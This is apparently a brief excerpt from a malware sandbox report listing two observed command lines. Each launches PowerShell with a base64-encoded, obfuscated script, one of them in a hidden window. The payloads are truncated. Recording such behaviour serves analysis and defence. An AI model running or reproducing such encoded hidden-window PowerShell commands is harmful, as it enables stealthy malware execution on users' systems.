Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABEAGEAbQB5ADMAZwBnAD0AKAAnAFkAJwArACgAJwB5ACcAKwAnADMAawAnACkAKwAoACcANQBfACcAKwAnADkAJwApACkAOwAmACgAJwBuAGUAdwAtAGkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABFAE4AVgA6AFUAUw...' (with hidden window)